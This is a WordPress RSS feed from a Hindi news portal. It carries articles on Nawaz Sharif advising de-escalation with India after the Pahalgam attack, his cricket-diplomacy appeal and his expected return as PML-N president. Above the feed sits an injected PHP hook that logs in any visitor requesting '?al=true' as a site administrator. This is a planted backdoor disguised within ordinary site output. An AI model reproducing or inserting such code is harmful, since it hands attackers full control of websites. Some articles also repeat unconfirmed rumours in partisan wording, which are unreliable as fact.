// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Nawaz Sharif – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Mon, 28 Apr 2025 13:36:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 भारत से जंग न ही हो तो अच्छा, छटपटा रहे पाक PM शहबाज को बड़े भाई नवाज की सलाह https://pratyushaashakinayikiran.com/?p=152362 Mon, 28 Apr 2025 13:36:00 +0000 https://pratyushaashakinayikiran.com/?p=152362 इस्लामाबाद
 पाकिस्तान के पूर्व प्रधानमंत्री नवाज शरीफ ने अपनी सरकार को भारत के साथ तनाव को कम करने की सलाह दी है। पाकिस्तान के तीन बार पीएम रहे नवाज शरीफ मौजूदा प्रधानमंत्री शहबाज शरीफ के बड़े भाई हैं। पाकिस्तान के सबसे सीनियर नेताओं में शुमार नवाज ने अपने भाई और पीएम शहबाज को साफतौर पर कहा है कि भारत के साथ युद्ध की ओर ना बढ़ें बल्कि कूटनीतिक तरीके अपनाकर तनाव को कम करें। पाकिस्तानी नेताओं की भारत के खिलाफ आक्रामक बयानबाजी के बीच नवाज शरीफ की ओर से यह सलाह दी गई है।

एक्सप्रेस ट्रिब्यून की रिपोर्ट के मुताबिक, पहलगाम हमले के बाद भारत के साथ उपजे तनाव के बीच शहबाज शरीफ ने अपने भाई नवाज शरीफ से मुलाकात की है। इस दौरान शहबाज शरीफ ने भारत से तनाव के संबंध में नवाज शरीफ को अपनी सरकार के फैसलों की जानकारी देते हुए बताया कि देश किसी भी आक्रमण का जवाब देने के लिए तैयार है। इस पर नवाज शरीफ ने कहा कि वह आक्रामक रुख अपनाने के पक्ष में नहीं हैं। उन्होंने शहबाज से कहा कि वह दो परमाणु शक्ति संपन्न देशों के बीच शांति बहाल करने के लिए सभी उपलब्ध राजनयिक संसाधनों का इस्तेमाल करें। बातचीत के जरिए भारत के साथ तनाव करने पर काम करें।

शहबाज ने नवाज से कहा- भारत झूठ बोल रहा

शहबाज शरीफ ने मुलाकात में नवाज शरीफ को बताया कि पहलगाम हमले में भारत झूठ बोल रहा है। इसमें पाकिस्तान का कोई किरदार नहीं है। इस हमले का मकसद क्षेत्र में अस्थिरता पैदा करना है। भारत ने एकतरफा तरीके से सिंधु समझौते से हटने का ऐलान कर दिया है। ये पाकिस्तान के लिए बड़ा संकट पैदा करता है। भारत के सिंधु समझौते को निलंबित करने के फैसले से युद्ध का खतरा बढ़ा है।

नवाज की सलाह पर शहबाज ने कहा कि पाकिस्तान शांति के लिए प्रतिबद्ध है लेकिन भारत की ओर से कोई कार्रवाई हुई तो जवाबी कदम उठाए जाएंगे। शहबाज ने ये भी बताया कि उनकी सरकार ने पहलगाम हमले की जांच के लिए भारत को अंतरराष्ट्रीय आयोग बनाने का प्रस्ताव दिया। इस पर नवाज ने कहा कि दोनों देशों और क्षेत्रीय स्थिरता के लिए शांति जरूरी है। ऐसे में प्राथमिकता बातचीत से चीजों को हल करना होना चाहिए।

क्या है पूरा मामला

कश्मीर के पहलगाम में 22 अप्रैल को बड़ा आतंकी हमला हुआ है। इस हमले में 26 लोगों की गोलियां बरसाकर हत्या कर दी गई। इस हमले के तार पाकिस्तान से जुड़े हैं। भारत ने पाकिस्तान के खिलाफ कई कदम उठाए हैं तो इस्लामाबाद की ओर से भी आक्रामक बयानबाजी की जा रही है और युद्ध की धमकी दी जा रही है। ऐसे में दोनों देशों के बीच तनाव चरम पर है।

भारत के डर से पाकिस्तानी सेना में मची 'भगदड़'

पहलगाम आतंकी हमले के बाद पाकिस्तान बौखला गया है। पाकिस्तान की शहबाज शरीफ सरकार के मंत्री एक तरफ ऊल-जलूल बयान देने में लगे हुए हैं। वहीं, दूसरी ओर पाकिस्तानी फौज के प्रमुख असीम मुनीर से इस्तीफा मांगा जा रहा है। कुछ मीडिया रिपोर्टों में अटकलें थीं कि मुनीर देश छोड़कर भाग गए हैं। कई रिपोर्टों में यह भी दावा किया गया है कि असीम मुनीर के परिवार ने भी देश छोड़ दिया है। इसके अलावा, बिलावल भुट्टो का परिवार भी देश छोड़कर जा चुका है। माना जा रहा है कि भारत पहलगाम हमले को लेकर पाकिस्तान के खिलाफ कोई बड़ी कार्रवाई कर सकता है। खुद प्रधानमंत्री नरेंद्र मोदी ने आतंकियों को ऐसी सजा देने की बात की है, जो आतंकियों की कल्पना से परे होगा। जानते हैं-क्या भारत की संभावित कार्रवाई के डर से पाकिस्तानी फौज की हालत खराब हो रही है।

जब पाकिस्तानी PMO को फोटो शेयर कर देनी पड़ी सफाई

कई मीडिया रिपोर्टों में कहा गया है कि जनरल मुनीर रावलपिंडी में एक बंकर में छिप गए हैं। इन अटकलों के बीच पाकिस्तान सरकार ने एक फोटो शेयर कर बताया कि 'सब ठीक ठाक है।' पाकिस्तानी प्रधानमंत्री कार्यालय के आधिकारिक X हैंडल से रविवार को एबटाबाद से एक ग्रुप फोटो पोस्ट की, जिसमें प्रधानमंत्री शहबाज शरीफ और जनरल मुनीर आगे की लाइन में बैठे हुए दिखाई दे रहे हैं। फोटो के साथ तारीख भी स्पष्ट रूप से कैप्शन देते हुए पाक पीएमओ ने कहा-26 अप्रैल, 2025 को प्रधानमंत्री मुहम्मद शहबाज शरीफ, सेना प्रमुख जनरल सैयद असीम मुनीर (NIM) और पीएमए काकुल के अधिकारी एबटाबाद के पीएमए काकुल में 151वें लॉन्ग कोर्स के ग्रेजुएट अधिकारियों के साथ एक ग्रुप फोटो में शामिल हुए।

मुनीर ने फिर उगला जहर-मुसलमान-हिंदू अलग मुल्क हैं

मुनीर ने बीते फिर जहर उगलते हुए कहा कि मुसलमान और हिंदू दो अलग-अलग मुल्क हैं। मुनीर ने इस बात पर जोर दिया था कि उनके पूर्वजों का मानना था कि हिंदू और मुसलमान जीवन के हर पहलू में भिन्न हैं। मुनीर शनिवार को खैबर-पख्तूनख्वा प्रांत के काकुल इलाके में पाकिस्तान सैन्य अकादमी (PMA) में कैडेट की पासिंग आउट परेड को संबोधित कर रहे थे। मुनीर ने कहा-द्वि-राष्ट्र सिद्धांत इस बुनियादी मान्यता पर आधारित था कि मुसलमान और हिंदू दो अलग-अलग राष्ट्र हैं, एक नहीं। मुसलमान जीवन के सभी पहलुओं- धर्म, रीति-रिवाज, परंपरा और सोच में हिंदुओं से अलग हैं।

]]>
इंडिया से संबंध बेहतर करने गिड़गिड़ा रहे नवाज शरीफ, रिश्ते बेहतर करने के लिए की ये डिमांड, मानेंगे मोदी? https://pratyushaashakinayikiran.com/?p=98417 Thu, 14 Nov 2024 10:06:00 +0000 https://pratyushaashakinayikiran.com/?p=98417 इस्लामाबाद
 पाकिस्तान के पूर्व प्रधानमंत्री नवाज शरीफ ने एक बार फिर भारत से रिश्ते सुधारने की अपील की है। नवाज शरीफ ने भारत से आग्रह किया है कि वह अपनी क्रिकेट टीम पाकिस्तान भेजें। एक्सप्रेस न्यूज की रिपोर्ट में  कहा गया कि शरीफ ने कहा कि अगर तनाव जारी रहता है तो इस तरह की पहल द्विपक्षी संबंधों को बेहतर बनाने में मदद दे सकती है। नवाज शरीफ लंदन में बोल रहे थे। उनके साथ उनकी बेटी और पंजाब की मुख्यमंत्री मरियम नवाज भी थीं।

दरअसल ICC चैंपियंस ट्रॉफी 2025 की मेजबानी पाकिस्तान के पास है। भारत ने सुरक्षा कारणों से अपनी टीम को पाकिस्तान न भेजने का फैसला लिया है। नवाज शरीफ ने भारत के इसी फैसले जिक्र करते हुए कहा कि भारत को मैचों के लिए पाकिस्तान का दौरा करना चाहिए। उन्होंने कहा, 'अगर रिश्ते तनावपूर्ण हैं तो उन्हें सुधारने की जरूरत है। लोग भारतीय क्रिकेट टीम को पाकिस्तान में खेलते हुए देखना चाहते हैं।'

अमेरिका से संबंधों पर दिया जोर

नवाज शरीफ ने आगे अन्य पड़ोसी देशों के साथ अच्छे संबंध रखने पर भी जोर दिया। पाकिस्तान और अमेरिका के बीच संबंधों की वर्तमान स्थिति पर अपने विचार व्यक्त करते हुए कहा कि दोनों देशों को अपने संबंधों को मजबूत करने के लिए काम करना चाहिए। उन्होंने कहा, 'पाकिस्तान और अमेरिका के बीच अच्छे संबंध होने चाहिए। अतीत में हमारे संबंध मजबूत थे, लेकिन इसमें और सुधार की जरूरत है।'

बम धमाके ने उठाए सुरक्षा पर सवाल

भारतीय टीम ने सुरक्षा कारणों से पाकिस्तान में न जाने का फैसला किया है। पिछले सप्ताह एक बम धमाके ने पाकिस्तान के सुरक्षा की पोल खोल दी और भारतीय क्रिकेट टीम के फैसले को सही साबित कर दिया। पाकिस्तान के बलूचिस्तान प्रांत में एक रेलवे स्टेशन पर शनिवार को धमाका हुआ, जिसमें 26 लोग मारे गए। इन धमाकों में सैनिक और रेलवे कर्मी भी मारे गए। पाकिस्तानी रेलवे ने एक बयान जारी कर सुरक्षा कारणों से चार दिनों के लिए रेल सेवा स्थगित कर दी है।

]]>
नवाज शरीफ का फिर से पीएमएल-एन अध्यक्ष चुना जाना तय https://pratyushaashakinayikiran.com/?p=35460 Wed, 29 May 2024 09:24:00 +0000 https://pratyushaashakinayikiran.com/?p=35460 नवाज शरीफ का फिर से पीएमएल-एन अध्यक्ष चुना जाना तय

 नवाज शरीफ फिर से सत्तारूढ़ पाकिस्तान मुस्लिम लीग-नवाज दल का अध्यक्ष चुना जाना तय

पाकिस्तान के परमाणु परीक्षण ने ‘विश्वसनीय न्यूनतम प्रतिरोध’ सुनिश्चित किया : शहबाज शरीफ

लाहौर
 पाकिस्तान के तीन बार प्रधानमंत्री रह चुके नवाज शरीफ  फिर से सत्तारूढ़ पाकिस्तान मुस्लिम लीग-नवाज (पीएमएल-एन) दल का अध्यक्ष चुना जाना तय है। पनामा पेपर मामले में उच्चतम न्यायालय के फैसले के बाद छह साल पहले उन्हें यह पद गंवाना पड़ा था।

डॉन अखबार की एक रिपोर्ट में बताया गया है कि एक स्थानीय होटल में जनरल कौंसिल की बैठक होने वाली है। ब्रिटेन में चार साल के निर्वासन के बाद पिछले साल अक्टूबर में पाकिस्तान लौटे 74 वर्षीय नवाज के निर्विरोध चुने जाने की संभावना है। हालांकि पार्टी के 11 सदस्यों ने इस शीर्ष पद के लिए नामांकन पत्र प्राप्त किया है।

रिपोर्ट में कहा गया है कि पीएमएल-एन ने पहले 11 मई को जनरल कौंसिल की बैठक बुलाने की घोषणा की थी, लेकिन पाकिस्तान के परमाणु शक्ति बनने के 26 साल पूरे होने के जश्न के मौके पर इसे स्थगित कर दिया गया।

पीएमएल-एन पंजाब के अध्यक्ष राणा सनाउल्लाह ने एक संवाददाता सम्मेलन को संबोधित करते हुए संकेत दिया कि शरीफ बिना किसी विरोध के चुने जाएंगे।

एक सवाल के जवाब में सनाउल्लाह ने कहा कि अगर पार्टी का कोई सदस्य उनके खिलाफ चुनाव लड़ना चाहता है तो उसे आगे आना चाहिए।

 

पाकिस्तान के परमाणु परीक्षण ने ‘विश्वसनीय न्यूनतम प्रतिरोध’ सुनिश्चित किया : शहबाज शरीफ

इस्लामाबाद
पाकिस्तान के पहले सफल परमाणु परीक्षण की 26वीं वर्षगांठ मनाते हुए प्रधानमंत्री शहबाज शरीफ ने  कहा कि यह ‘‘विश्वसनीय न्यूनतम प्रतिरोध’’ स्थापित करने की दिशा में देश के कठिन लेकिन उल्लेखनीय मार्ग को दर्शाता है।

पाकिस्तान ने भारतीय सेना के पोखरण परमाणु परीक्षण के जवाब में बलूचिस्तान प्रांत के दूरस्थ चागई पर्वत में एक गहरी सुरंग खोदकर 28 मई 1998 को छह परमाणु परीक्षण किए थे। पाकिस्तान उसके रक्षा भंडार में परमाणु हथियार रखने वाला 1998 में दुनिया का सातवां परमाणु संपन्न देश और पहला मुस्लिम देश बन गया था।

पाकिस्तान के इस सफल परमाणु परीक्षण को ‘‘यौम-ए-तकबीर’’ कहा जाता है जिसका अर्थ ‘‘महानता का दिवस’’ या ‘‘ईश्वर की महानता का दिवस’’ है। इसे हर साल राष्ट्रीय उत्साह के साथ मनाया जाता है। शरीफ ने हाल फिलहाल में पहली बार मंगलवार को सार्वजनिक अवकाश की घोषणा की है।

सोशल मीडिया मंच ‘एक्स’ पर अपने संदेश में देश को बधाई देते हुए शरीफ ने कहा कि यह दिन राष्ट्रीय शक्ति के सभी पहलुओं के सामूहिक प्रयास का प्रतीक है। उन्होंने कहा, ‘‘28 मई महज एक दिवस के स्मरणोत्सव से कहीं अधिक का प्रतीक है : यह एक विश्वसनीय न्यूनतम प्रतिरोध स्थापित करने की दिशा में हमारे देश के कठिन लेकिन उल्लेखनीय मार्ग को दर्शाता है। 1998 में इस ऐतिहासिक दिन पर प्रधानमंत्री नवाज शरीफ ने पाकिस्तान को परमाणु संपन्न देश बनाने के लिए अत्यंत दबाव और प्रलोभनों को अस्वीकार कर साहसिक नेतृत्व दिखाया था।’’

शरीफ के बयान में परमाणु वैज्ञानिक डॉ. अब्दुल कादिर खान के नाम का जिक्र नहीं है जिन्होंने लगभग दो दशकों तक एहतियातन हिरासत में रहने के बाद इस कार्यक्रम में अहम भूमिका निभायी थी।

 

 

]]>